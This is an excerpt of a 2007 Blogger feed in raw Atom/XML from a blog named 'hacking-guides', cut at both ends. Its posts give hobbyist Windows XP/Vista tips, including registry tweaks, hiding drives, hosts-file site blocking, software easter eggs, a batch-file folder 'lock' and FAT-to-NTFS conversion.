Reboot</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4547288711945006676/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4547288711945006676' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4547288711945006676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4547288711945006676'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/disabling-f3-search-key.html' title='Disabling the F3 search key'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-181585209339770761</id><published>2007-12-30T01:08:00.001-08:00</published><updated>2007-12-30T01:09:43.004-08:00</updated><title type='text'>Change your processors name</title><content type='html'>Go To &lt;strong&gt;Start and type RUN&lt;/strong&gt;&lt;br /&gt;&lt;span style="color:#333399;"&gt;&lt;strong&gt;TYPE REGEDIT&lt;br /&gt;HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;On the right hand side, just right click on the string ProcessorNameString and then click OK.&lt;br /&gt;&lt;br /&gt;Now &lt;strong&gt;Modify&lt;/strong&gt; it and &lt;span style="color:#33cc00;"&gt;write what 
you want to write ..&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-181585209339770761?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/181585209339770761/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=181585209339770761' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/181585209339770761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/181585209339770761'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/change-your-processors-name.html' title='Change your processors name'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-2656824325347578269</id><published>2007-12-30T01:05:00.000-08:00</published><updated>2007-12-30T01:07:58.352-08:00</updated><title type='text'>Turn off system beeps</title><content type='html'>&lt;p&gt;Navigate to &lt;strong&gt;&lt;span style="color:#009900;"&gt;HKEY_CURRENT_USER\Control Panel\Sound&lt;/span&gt;&lt;/strong&gt; Once there, &lt;strong&gt;locate Beep&lt;/strong&gt; on the list on the right. 
&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;br /&gt;Right click on it and select &lt;strong&gt;Modify &lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;br /&gt;Change the value equal to &lt;strong&gt;no &lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;br /&gt;&lt;span style="color:#990000;"&gt;Reboot your computer&lt;/span&gt; and the beeps will be gone!&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-2656824325347578269?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/2656824325347578269/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=2656824325347578269' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2656824325347578269'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2656824325347578269'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/navigate-to-hkeycurrentusercontrol.html' title='Turn off system beeps'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8499261159338895130</id><published>2007-12-30T00:59:00.000-08:00</published><updated>2007-12-30T01:04:18.093-08:00</updated><title type='text'>Hide hard drives in Windows vista</title><content type='html'>Back up your registry before you start!&lt;br /&gt;&lt;br /&gt;1. 
Open &lt;strong&gt;Regedit&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;2. Navigate to one of these keys:&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\&lt;br /&gt;CurrentVersion\Policies\Explorer&lt;/span&gt; - this only changes the settings for the currently logged-in user&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\&lt;br /&gt;CurrentVersion\Policies\Explorer&lt;/span&gt; - this changes the settings for all users on the machine. You may have to create the key folder "Explorer" manually.&lt;br /&gt;&lt;br /&gt;3. In the Explorer key folder, create a new &lt;strong&gt;DWORD&lt;/strong&gt; value by right-clicking Explorer, then choosing &lt;strong&gt;New DWORD value&lt;/strong&gt;. Name the value "NoDrives" &lt;strong&gt;(without the quotes).&lt;/strong&gt; This value defines local and network drive visibility for each logical drive on the computer. All drives will be visible as long as this value's data is set to 0.&lt;br /&gt;&lt;br /&gt;4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as the NoDrives value data. 
When you right-click on NoDrives and choose Modify, &lt;span style="color:#006600;"&gt;&lt;strong&gt;make sure you select Decimal base, not Hexadecimal&lt;/strong&gt;&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Drive: number to hide&lt;br /&gt;&lt;strong&gt;A: 1&lt;br /&gt;B: 2&lt;br /&gt;C: 4&lt;br /&gt;D: 8&lt;br /&gt;E: 16&lt;br /&gt;F: 32&lt;br /&gt;G: 64&lt;br /&gt;H: 128&lt;br /&gt;I: 256&lt;br /&gt;J: 512&lt;br /&gt;K: 1024&lt;br /&gt;L: 2048&lt;br /&gt;M: 4096&lt;br /&gt;N: 8192&lt;br /&gt;O: 16384&lt;br /&gt;P: 32768&lt;br /&gt;Q: 65536&lt;br /&gt;R: 131072&lt;br /&gt;S: 262144&lt;br /&gt;T: 524288&lt;br /&gt;U: 1048576&lt;br /&gt;V: 2097152&lt;br /&gt;W: 4194304&lt;br /&gt;X: 8388608&lt;br /&gt;Y: 16777216&lt;br /&gt;Z: 33554432&lt;br /&gt;All drives: 67108863&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;If you want to hide more than one drive, simply add the drive values together for a combined total.&lt;br /&gt;&lt;br /&gt;For example, to hide the D: and T: drives, add the decimal value for the D: drive to the decimal value for the T: drive.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#330099;"&gt;8 (D) + 524288 (T) = 524296&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;To hide all of your drives, set the value to 67108863.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;You must&lt;em&gt; reboot your PC to see your changes.&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8499261159338895130?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8499261159338895130/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8499261159338895130' title='0 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8499261159338895130'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8499261159338895130'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hide-hard-drives-in-windows-vista.html' title='Hide hard drives in Windows vista'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1225180964150102796</id><published>2007-12-30T00:48:00.000-08:00</published><updated>2007-12-30T00:56:41.361-08:00</updated><title type='text'>Hidden secrets(part 1)</title><content type='html'>&lt;strong&gt;Doggy Sound In Acrobat Reader &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;You need:&lt;/span&gt; Acrobat Reader 4.0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do the following :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.&lt;/strong&gt; Open up &lt;span style="color:#ff0000;"&gt;Acrobat Reader.&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;2.&lt;/strong&gt; Choose &lt;strong&gt;&lt;span style="color:#333399;"&gt;Help, About Plug-ins, Acrobat Forms.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; Hold down &lt;span style="color:#006600;"&gt;&lt;strong&gt;Control-Alt-Shift&lt;/strong&gt;&lt;/span&gt; and click the &lt;strong&gt;Credits button.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; You should hear a &lt;strong&gt;dog bark,&lt;/strong&gt; the button face will change to say&lt;strong&gt; "woof,"&lt;/strong&gt; and the Adobe logo will turn into a &lt;strong&gt;dog paw.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;span 
style="font-size:130%;"&gt;&lt;strong&gt;Espionage in Excel&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;You need:&lt;/span&gt; Excel 2000 and DirectX&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do the following:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Open a new worksheet in &lt;strong&gt;&lt;span style="color:#009900;"&gt;Excel 2000.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Select File, &lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Save as Web Page.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Select &lt;strong&gt;Publish&lt;/strong&gt; and &lt;strong&gt;check the box marked Add interactivity with.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Save the file as &lt;strong&gt;&lt;span style="color:#003300;"&gt;spy.html.&lt;/span&gt;&lt;/strong&gt; Be sure to note the folder you saved the file in.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Load Internet Explorer, and &lt;strong&gt;&lt;span style="color:#000099;"&gt;choose File, Open and locate spy.html&lt;/span&gt;&lt;/strong&gt;. The spreadsheet should appear in the middle of the page.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. &lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;Scroll to row 2000, column WC&lt;/span&gt;&lt;/strong&gt;. Select row 2000, and press the Tab key until WC is the active column in that row.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Hold down &lt;strong&gt;&lt;span style="color:#66cccc;"&gt;Shift-Ctrl-Alt&lt;/span&gt;&lt;/strong&gt; and click the Office logo in the upper-left corner of the dialog box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. 
Get ready to play a &lt;strong&gt;spy hunter-type game.&lt;/strong&gt; Use your keyboard to move around and make things happen: The arrow keys let you drive; the space bar will let you fire; "O" lets you drop oil slicks; and "H" will turn on your headlights when it gets dark.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-1225180964150102796?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1225180964150102796/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1225180964150102796' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1225180964150102796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1225180964150102796'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hidden-secretspart-1.html' title='Hidden secrets(part 1)'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7124395482299384347</id><published>2007-12-27T01:56:00.000-08:00</published><updated>2007-12-28T01:39:10.545-08:00</updated><title type='text'>How to block and unblock websites</title><content type='html'>Many times in schools, colleges &amp;amp; offices, surfing some sites like orkut, etc. is &lt;strong&gt;banned!&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;To overcome this, you can unblock these or block some 
other websites and play pranks!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do the following:&lt;br /&gt;For example, suppose you want to &lt;strong&gt;block&lt;/strong&gt; www.xyz.com.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Open the folder&lt;span style="color:#ff0000;"&gt; C:\WINDOWS\system32\drivers\etc&lt;/span&gt;&lt;br /&gt;* There you will find a file named &lt;strong&gt;HOSTS&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;* Click on the file, &lt;strong&gt;press SHIFT and now right-click on it.&lt;br /&gt;&lt;/strong&gt;* From the right-click menu select &lt;strong&gt;Open with&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;* Now, select Notepad from the list to open the file.&lt;br /&gt;* Now, in the file under the line &lt;span style="color:#33cc00;"&gt;127.0.0.1 localhost&lt;/span&gt; add another line as &lt;span style="color:#000099;"&gt;127.0.0.2 www.xyz.com&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;* Now, File&gt;&gt;Save.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now, open your web browser and try opening www.xyz.com; it will not load.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To unblock sites &lt;strong&gt;just do the opposite!&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-7124395482299384347?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7124395482299384347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7124395482299384347' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7124395482299384347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7124395482299384347'/><link rel='alternate' type='text/html' 
href='http://hacking-guides.blogspot.com/2007/12/many-times-in-schools-colleges-offices.html' title='How to block and unblock websites'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7258375765399337082</id><published>2007-12-27T01:51:00.000-08:00</published><updated>2007-12-27T01:57:19.740-08:00</updated><title type='text'>How to create a boot disk</title><content type='html'>How to create a &lt;strong&gt;&lt;span style="color:#ff0000;"&gt;boot disk&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;This is quite simple.&lt;strong&gt;&lt;br /&gt;1:&lt;/strong&gt; Go into &lt;strong&gt;MY COMPUTER&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;2:&lt;/strong&gt; Have a floppy disk in your drive, then &lt;strong&gt;RIGHT&lt;/strong&gt;-click on the floppy drive and click on &lt;strong&gt;FORMAT&lt;br /&gt;3:&lt;/strong&gt; You will be greeted with a number of options. The one you need to select is &lt;strong&gt;"Create an MS-DOS start up disk".&lt;br /&gt;4:&lt;/strong&gt; Click OK&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;&lt;span style="color:#ff6600;"&gt;Note&lt;/span&gt;&lt;/strong&gt;:&lt;/span&gt; This requires up to 5 floppy disks and DOES NOT contain ANY CD-ROM drivers to boot from. A proper CD-ROM boot-up disk is going to be released by Microsoft after the Windows XP public release. 
You can, however, use your old Windows Me start-up disk if you prefer, as long as you have not upgraded to an NTFS drive.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-7258375765399337082?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7258375765399337082/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7258375765399337082' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7258375765399337082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7258375765399337082'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/how-to-create-boot-disk-this-is-quite.html' title='How to create a boot disk'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3263290047764236556</id><published>2007-12-27T01:42:00.000-08:00</published><updated>2007-12-27T01:45:42.745-08:00</updated><title type='text'>Convert a FAT partition to NTFS</title><content type='html'>To convert a FAT partition to NTFS, perform the following steps.&lt;br /&gt;&lt;br /&gt;Click Start, click Programs, and then click &lt;strong&gt;Command Prompt.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;In Windows XP, click Start, and then click Run.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;At the command prompt, type &lt;strong&gt;&lt;span 
style="color:#33cc00;"&gt;CONVERT [driveletter]: /FS:NTFS.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Convert.exe will attempt to convert the partition to NTFS.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Convert.exe will attempt to convert the partition to &lt;strong&gt;NTFS.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3263290047764236556?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3263290047764236556/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3263290047764236556' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3263290047764236556'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3263290047764236556'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/to-convert-fat-partition-to-ntfs.html' title='Convert a FAT partition to NTFS'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3655029207076773846</id><published>2007-12-27T01:39:00.000-08:00</published><updated>2007-12-27T01:42:05.023-08:00</updated><title type='text'>Lock your folders without use of software</title><content type='html'>Now lock your folders without the use of any additional software&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Procedure:&lt;br /&gt;1. Make a folder on the desktop and name it "folder"&lt;br /&gt;2. Now, open Notepad and write&lt;span style="color:#33cc00;"&gt; ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} &lt;/span&gt;and then (Notepad menu) File&gt;Save as.&lt;br /&gt;3. In the 'Save as' dialog, name it &lt;strong&gt;lock.bat&lt;/strong&gt; and click Save!&lt;strong&gt; (Save it on the Desktop)&lt;br /&gt;&lt;/strong&gt;4. Now, open Notepad again and write &lt;span style="color:#ff0000;"&gt;ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D}&lt;/span&gt; folder and then (Notepad menu) File&gt;Save as.&lt;br /&gt;5. In the 'Save as' dialog, name it &lt;strong&gt;key.bat&lt;/strong&gt; and click Save! &lt;strong&gt;(Save it on the Desktop)&lt;br /&gt;&lt;/strong&gt;6. Now, double-click &lt;strong&gt;lock.bat&lt;/strong&gt; to lock the folder; now if you open your folder, Control Panel will open up instead!&lt;br /&gt;7. Now, double-click &lt;strong&gt;key.bat&lt;/strong&gt; to unlock the folder; now if you open your folder, you can access the data inside it again!&lt;br /&gt;8. Lock your folder and hide key.bat somewhere else on your hard disk!&lt;br /&gt;9. 
Whenever you want to open your folder, just paste key.bat on the desktop and open your folder using it!&lt;br /&gt;&lt;br /&gt;Simple!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3655029207076773846?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3655029207076773846/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3655029207076773846' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3655029207076773846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3655029207076773846'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/lock-your-folders-witout-use-of.html' title='Lock your folders without use of software'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7404202505076237261</id><published>2007-12-27T01:37:00.000-08:00</published><updated>2007-12-29T06:27:58.909-08:00</updated><title type='text'>Ever wanted to maintain a diary on your PC</title><content type='html'>Ever wanted to maintain a diary on your PC?&lt;br /&gt;Now, you can do it &lt;span style="color:#ff0000;"&gt;without the use of any software!&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;USE NOTEPAD!&lt;br /&gt;&lt;br /&gt;Do the following:&lt;br /&gt;&lt;strong&gt;1.&lt;/strong&gt; Open Notepad&lt;br 
/&gt;&lt;strong&gt;2.&lt;/strong&gt; Type : &lt;strong&gt;.LOG&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; Save it with any name say 'Diary'&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; Open Diary.txt again&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Wow&lt;/strong&gt; you see today's date and time, so start writing your Diary !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-7404202505076237261?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7404202505076237261/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7404202505076237261' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7404202505076237261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7404202505076237261'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/ever-wanted-to-maintain-diary-on-your.html' title='Ever wanted to maintain a diary on your PC'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-5297753618618443357</id><published>2007-12-27T01:34:00.000-08:00</published><updated>2007-12-27T01:44:46.200-08:00</updated><title type='text'>Make your own icon in Windows XP</title><content type='html'>&lt;span style="color:#000099;"&gt;Now even personalize your ICONS with Windows XP !&lt;br 
/&gt;&lt;/span&gt;&lt;br /&gt;To make your own &lt;strong&gt;ICON&lt;/strong&gt;:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1&lt;/strong&gt;. Start&gt;&gt;All Programs&gt;&gt;Accessories&lt;br /&gt;&lt;strong&gt;2.&lt;/strong&gt; Click Paint&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; In the toolbar select Image&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; Click Attributes&lt;br /&gt;&lt;br /&gt;--------------------- Note: The size of an icon is 32 x 32 pixels! ---------------------&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;5.&lt;/strong&gt; Type 32 in both Height and Width and make sure that Pixels is selected under Units&lt;br /&gt;&lt;strong&gt;6.&lt;/strong&gt; Click OK&lt;br /&gt;&lt;strong&gt;7&lt;/strong&gt;. Now add your photo or design.&lt;br /&gt;&lt;strong&gt;8.&lt;/strong&gt; File&gt;&gt;Save As&lt;br /&gt;&lt;strong&gt;9.&lt;/strong&gt; Type name.ico&lt;br /&gt;&lt;strong&gt;10&lt;/strong&gt;. Click Save&lt;br /&gt;&lt;br /&gt;Enjoy your new ICON!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-5297753618618443357?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/5297753618618443357/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=5297753618618443357' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5297753618618443357'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5297753618618443357'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/make-your-own-icon-in-windows-xp.html' title='Make your own icon in Windows 
XP'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4008615852970466902</id><published>2007-12-14T07:14:00.001-08:00</published><updated>2007-12-14T07:14:37.746-08:00</updated><title type='text'>Xp registry hacks</title><content type='html'>Editing the Windows Registry, while much more common now than in years past, is still not to be entered into lightly. You can break Windows, cause boot failure, yada, yada. I know you're gonna do it anyway; why else would you be reading this? Just be careful, OK?&lt;br /&gt;&lt;br /&gt;These are few because, for the most part, WinXP can be customized through the interface or with third-party freeware (as above).&lt;br /&gt;&lt;br /&gt;All of the tips below require running regedit. To do so, hit 'Start/Run', then type 'regedit' and follow the instructions.&lt;br /&gt;&lt;br /&gt;Naturally, I take no responsibility for any damage or loss of data incurred in the remote possibility that something goes terribly wrong.&lt;br /&gt;&lt;br /&gt;Outlook Express Splash&lt;br /&gt;If it's important enough to you to edit the registry in order to get rid of the OE splash page, here's how. With regedit open, go to HKEY_CURRENT_USER\Identities\{long number here will vary}\Software\Microsoft\Outlook 